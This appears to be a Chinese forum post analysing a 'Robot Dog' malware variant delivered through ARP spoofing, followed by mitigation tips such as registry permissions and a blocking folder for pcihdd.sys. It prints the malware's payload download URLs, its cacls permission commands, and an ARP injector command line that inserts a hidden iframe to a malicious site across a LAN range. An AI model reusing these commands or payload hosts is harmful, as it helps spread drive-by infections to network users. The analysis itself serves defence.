机器狗``
最近好像又很疯狂的机器狗,运气不错,抓到个比较新的变种。
其实一开始并不是机器狗主体,而是一个ARP病毒。
(这个版本的机器狗比较恶心,能防止身己被NTFS文件系统禁创建、读取的权限)
哈哈````好了,8扯了```,开始:
开始的毒网连接:
[url]http://xxx.m111.biz/nicai.cer[/url]
有3个东东:
hp://xxx.m111.biz/x.jpg
hp://xxx.m111.biz/x1.jpg
hp://xxx.m111.biz/x2.jpg
其实都是可执行PE文件=。=
第一个x.jpg,释放一个VB程序,调用浏览器访问网站:
[url]http://xxx.m111.biz/tongji.htm[/url]
统计感染该病毒的人数。。。
-_-!
第二个x1.jpg,主要工作:
%Temp%释放随机命名的P处理,建立pcihdd.sys文件夹
本身并不判断文件系统,直接P处理,保证pcihdd.sys、userinit.exe不被NTFS文件系统的权限控制:
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:\winnt\system32\drivers\pcihdd.sys /e /p everyone:n
Path: C:\WINNT\system32\CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:\winnt\system32\drivers\pcihdd.sys /e /p everyone:n
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r
Path: C:\WINNT\system32\CMD.EXE
PID: 468
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\cacls.exe
Information: Control ACLs Program (Microsoft Corporation)
Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r
第三个x2.jpg :
也差不多拉,主要是保证ARP嗅探器的文件权限不被控制
然后释放病毒文件pvc.exe,于192.168.0.1-192.168.0.254网段
加入框架(病毒)数据包,参数为:
-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='hXXp://xxx.mmma.biz/js.htm' width=0 height=0></iframe>"
电脑少于5000的建议不要点上面的连接,超级卡````
'hXXp://xxx.mmma.biz/js.htm'
连接:
hXXp://xxx.mmma.biz/ps.js
这个东东加密了,解密后连接3个网址:
其中一个是流量统计的,其他2个都是加密过的,一个是unescape,另一个是8进制加密
第一个是暴风影音的漏洞,第二个是百度搜霸的漏洞```
解密后得样本:
hXXp://xxx.mmma.biz/***.exe
病毒行为:
去除pcihdd.sys的文件属性,并删除原有的pcihdd.sys文件夹。
然后继续下载:
h**p://xx*.mmma.biz/big.exe
h**p://xx*.mmma.biz/big1.exe
哈哈,自始至终终于见到机器狗了(big.exe)
第2个是上面分析过的ARP病毒,哈哈``54ing``删掉
再看看那个机器狗,哈``首先检测pcihdd.sys是否存在。
若不在则注册该驱动,然后判断条件,
如果满足以下条件则退出,不做其他操作:
1、不是启动分区,比如说双系统。
2、文件系统,哈哈``不会是针对FAT16的吧
3、如果是NTFS,使用了文件压缩功能,可能导致病毒驱动在计算Userinnt地址时会出现错误?
4、读取Userinnt失败(设置权限),这个版本的小狗应该还不至于出现这情况。
如果没有意外,则pcihdd.sys访问磁盘底层,读取%SystemRoot%\System32\Userinit.exe
并修改。(应该会穿过一些还原类的东东`)
我测试被HIPS自动拒绝,所以。。。。>_<
能不能穿透影子还不知道。
被修改后的Userinit.exe,重启系统后联网下载东东:
[url]http://ilove.com/ttt.cer[/url]
(失效了???我打开时候是一个外国的交友站-_-!!!)
至于解决方法,基本有这几条思路:
1、杀软或HIPS禁止其运行。(对个人PC比较实用)
2、权限设置,禁止修改Userinit.exe和创建pcihdd.sys。(看起来比较渺茫``HIPS的FD可以)
3、路由或防火墙那里把hXXp://xxx.mmma.biz屏蔽了,(救得一时急,哈哈``)
4、注册表权限,这个比较简单,网吧或局域环境的,操作起来不会太难:
我的是2K系统,比较麻烦```:
开始-运行-regedt32(XP系统不用,直接运行regedit就可以!)
在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ (系统服务)
建立个名为PciHdd的空键,然后上权限,system和管理员权限的都要设置。
如果已经有了PciHdd,不用删它,设置为禁止控制和读取 ^_^
5、最后一个比较推荐:
CMD
cd ……到drivers
md pcihdd.sys
cd pcihdd.sys
md 1...\
就酱紫拉,我测试过了,关闭所有防护,直接运行机器狗,它会提示加载驱动失败,第4点也一样~~
偶比较懒,P处理就不写了`` :-)
OK,收工
和疯狗过招的一些“花絮”:
